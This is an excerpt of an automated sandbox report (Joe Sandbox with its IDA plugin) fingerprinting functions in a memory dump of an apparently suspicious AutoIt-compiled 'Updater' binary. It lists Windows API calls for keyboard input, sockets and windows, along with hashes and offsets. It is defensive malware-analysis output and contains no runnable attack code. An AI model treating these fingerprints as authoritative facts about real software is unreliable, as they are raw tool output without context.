                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                    • API String ID: 176396367-2734436370
                                                                                                                                                    • Opcode ID: 7113e9338e9ed32ba8d57aada6f35a5f5c1dee6194f51311c458b1e518fd7195
                                                                                                                                                    • Instruction ID: d6804b2cd3fb30ebdf3faa5466e009a5387958efbaea8fde0706e12cefad24b3
                                                                                                                                                    • Opcode Fuzzy Hash: 7113e9338e9ed32ba8d57aada6f35a5f5c1dee6194f51311c458b1e518fd7195
                                                                                                                                                    • Instruction Fuzzy Hash: 1E213732110511AAE721B7249C46FBBB3D8DF51300F6884BBF942872A2FBA09D41D397
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BB48F7
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BB490B
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB492F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                    • Opcode ID: 3890907c50ed25ac38431b4debc97b45fadb56bf7adb9e1247d6a8c09451041f
                                                                                                                                                    • Instruction ID: dc3e01574d2ee8030496f32241571e052852d91e5242bd8b22e5efff49c0176e
                                                                                                                                                    • Opcode Fuzzy Hash: 3890907c50ed25ac38431b4debc97b45fadb56bf7adb9e1247d6a8c09451041f
                                                                                                                                                    • Instruction Fuzzy Hash: D8219F32600219BFDF218F54CC86FEA3BA9FF48724F110254FE596B1D1DBB5A8519BA0
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BB50D7
                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BB50E5
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BB50EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                    • Opcode ID: b04b97b46f33bfbf23cbf6271ee3aba657f3b06010116e8a1cbc287fec03c428
                                                                                                                                                    • Instruction ID: 784c30452e9881a99230b5c8fc91bcaaf024707cdd36d43fe5e94ed64a75b757
                                                                                                                                                    • Opcode Fuzzy Hash: b04b97b46f33bfbf23cbf6271ee3aba657f3b06010116e8a1cbc287fec03c428
                                                                                                                                                    • Instruction Fuzzy Hash: BE2181B5600609AFDB20DF28CCC1DB737ECEF59394B504099FA019B2A1CBB1EC01CAA1
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BB41D8
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BB41E8
                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BB420E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                    • String ID: Listbox
                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                    • Opcode ID: 69e844fcea3f20346f33afc069816390764e6f616020672500e67a69a0788fce
                                                                                                                                                    • Instruction ID: 122e28a3f914d1ebe09607ee49ee27e1d7e99ad6f2c7df50a7dadfd4ac41869e
                                                                                                                                                    • Opcode Fuzzy Hash: 69e844fcea3f20346f33afc069816390764e6f616020672500e67a69a0788fce
                                                                                                                                                    • Instruction Fuzzy Hash: EF21AF32A10118BBDF118F58CC85EFB3BAEEF99754F118164F904AB191CBB1DC5287A0
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B955A8
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B955FC
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00B95670
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                    • String ID: %lu
                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                    • Opcode ID: 3de5b571f3eab4a71105370f8290be4ae9692e0c527a7a1582e4a048b3ca0dce
                                                                                                                                                    • Instruction ID: ec3c131e926779ab3e26efa11638522b855d642588da319dcb02d598d4362a55
                                                                                                                                                    • Opcode Fuzzy Hash: 3de5b571f3eab4a71105370f8290be4ae9692e0c527a7a1582e4a048b3ca0dce
                                                                                                                                                    • Instruction Fuzzy Hash: 81315070A00109AFDB10DF54C985EAA77F8EF08304F1440E8F909DB262DB75EE45CB61
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BB4C08
                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BB4C1D
                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BB4C2A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                    • Opcode ID: d98207933ef3586f4c0dffe62d9f16e586d496f6a7792dae1209fc358add64fe
                                                                                                                                                    • Instruction ID: 01e6c071562fc00afa2814fae13c4b3ad7fe79b084570a6335eb3c1005f4facb
                                                                                                                                                    • Opcode Fuzzy Hash: d98207933ef3586f4c0dffe62d9f16e586d496f6a7792dae1209fc358add64fe
                                                                                                                                                    • Instruction Fuzzy Hash: 9911CE31240208BFEF205E29CC06FFB3BE8EF95B64F120624FA55E20A1D6B1D8119B20
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cf9d648d712d62e78a8b960147c2f6b7cd977bdad92b78f69ebd04271277ee0e
                                                                                                                                                    • Instruction ID: caca6adf7a3783ff27dc0521ef71ba6f428fab3bc37bc0bd0b28c1834b78319a
                                                                                                                                                    • Opcode Fuzzy Hash: cf9d648d712d62e78a8b960147c2f6b7cd977bdad92b78f69ebd04271277ee0e
                                                                                                                                                    • Instruction Fuzzy Hash: 54C14C75A01206EFDB14DF98C884AAAB7F9FF48704F148999E905EB261D731ED42CB90
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: ebffb7cd37816736c4ab8f1e2bdbb635f0ecb427a66b56729ff1e2677a7d9340
                                                                                                                                                    • Instruction ID: bdbebb63e7044e1284d7a86a2d7a339461db59a31c441025bf126614ae48cd5c
                                                                                                                                                    • Opcode Fuzzy Hash: ebffb7cd37816736c4ab8f1e2bdbb635f0ecb427a66b56729ff1e2677a7d9340
                                                                                                                                                    • Instruction Fuzzy Hash: 3E413B32A00100BBDB20BBBD8C8276E3AE4EF56371F1C4AD5F819D73A1EA384C045676
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(01370718,?), ref: 00BB6D05
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00BB6D38
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BB6DA5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                    • Opcode ID: b6047028d03f0729ca2335ee9545d43b7e00e5cbc7ab271d483d0aa4adea91b4
                                                                                                                                                    • Instruction ID: e87026b6c296c83b4559123d3dd78cd2a1fd229091bb77831e4cec7374566fc9
                                                                                                                                                    • Opcode Fuzzy Hash: b6047028d03f0729ca2335ee9545d43b7e00e5cbc7ab271d483d0aa4adea91b4
                                                                                                                                                    • Instruction Fuzzy Hash: D6513D35A00209AFCB24DF64C880AFE7BF5EF44320F2081A9F9559B290D7B5ED41CB90
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BA26D9
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00BA26E7
                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BA2766
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00BA2770
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                    • Opcode ID: aefa3df0dfef8fcf8b8f2bc1964aa778a929d03e0eea119884ecf6c409b1f1fa
                                                                                                                                                    • Instruction ID: 2523451e1902300dad9c7b2505309471d323659444f0fe19935019fc9f4e9d9b
                                                                                                                                                    • Opcode Fuzzy Hash: aefa3df0dfef8fcf8b8f2bc1964aa778a929d03e0eea119884ecf6c409b1f1fa
                                                                                                                                                    • Instruction Fuzzy Hash: 1641A274600210AFE720AF24D896F2A77E5EF05714F54C498F9199F2D3DA76DE41CB90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 376bc646445a3669fed3770add9900522623448d7508f0c685e0764e0b999798
                                                                                                                                                    • Instruction ID: beb0391656f8f67b376233c8c70760f12cd332f9d1ad34ed098b365654a8dfd4
                                                                                                                                                    • Opcode Fuzzy Hash: 376bc646445a3669fed3770add9900522623448d7508f0c685e0764e0b999798
                                                                                                                                                    • Instruction Fuzzy Hash: 6441D872A00704AFD724AF78C841F6EBFE8EB85711F1045EAF915EB291D77299098B90
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,71E85006,00B46C9C,00000000,00000000,00B48204,?,00B48204,?,00000001,00B46C9C,71E85006,00000001,00B48204,00B48204), ref: 00B5D740
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B5D7C9
                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B5D7DB
                                                                                                                                                    • __freea.LIBCMT ref: 00B5D7E4
                                                                                                                                                      • Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                    • Opcode ID: e865e2c052bec687166d99a69331a417e3a55c2996df50cd3f1b70a5f0a18520
                                                                                                                                                    • Instruction ID: e18a842a4d9223a134af4685745289f5ffc7017885abaf1eec986af8a5d2c847
                                                                                                                                                    • Opcode Fuzzy Hash: e865e2c052bec687166d99a69331a417e3a55c2996df50cd3f1b70a5f0a18520
                                                                                                                                                    • Instruction Fuzzy Hash: 1931AE32A0020AABDF259F64DC85EAE7BE5EF48711F1402A8FC04D7151EB35DD54CB90
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B8B8EF
                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00B8B90B
                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B8B979
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B8B9CB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: 790519dece7f54c9978a2f0a4ce26a4969b5ef42d2ff88bedc89e3caba02a2c3
                                                                                                                                                    • Instruction ID: 9d79e219a616eade28aa9a33b112ce6fdb9b33f617b125b0265d88c401d2e509
                                                                                                                                                    • Opcode Fuzzy Hash: 790519dece7f54c9978a2f0a4ce26a4969b5ef42d2ff88bedc89e3caba02a2c3
                                                                                                                                                    • Instruction Fuzzy Hash: 51312870E44218AEFF34AB75CC05FFABBE5EB49320F08429AE685961F0D7748981D791
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B8BA36
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B8BA52
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B8BAB9
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B8BB0B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: 92e2613076e7d048a04e038e5dd9da23c40c9f661b820a8118c9de037a6aa747
                                                                                                                                                    • Instruction ID: bb34c3beecbd24431a98c172aacad9c7dbb18a7a3ad14ebf1f2adc44a1fbee14
                                                                                                                                                    • Opcode Fuzzy Hash: 92e2613076e7d048a04e038e5dd9da23c40c9f661b820a8118c9de037a6aa747
                                                                                                                                                    • Instruction Fuzzy Hash: 30312630A40608AEFB38EA75CC05FFA7BE5EF45310F08429AE495961F1DB788945C7A1
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(01381E48,?), ref: 00BB8061
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00BB80D7
                                                                                                                                                    • PtInRect.USER32(?,?,00BB9573), ref: 00BB80E7
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00BB8153
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: b8980c7f9ed036a881b8f64d2b0583646e4d3b1cf97ef00d2a9361677db5ff47
                                                                                                                                                    • Instruction ID: b9466993b9c4a2137f763974405bede1e0b1b6aa38cf7ee1abf864507ad48143
                                                                                                                                                    • Opcode Fuzzy Hash: b8980c7f9ed036a881b8f64d2b0583646e4d3b1cf97ef00d2a9361677db5ff47
                                                                                                                                                    • Instruction Fuzzy Hash: 75418E30601218DFCB11DF5CC885AF9B7F9FF49310F1481E9E915AB260CBB1A842CB50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8EE26
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8EE3D
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8EE68
                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B8EE73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
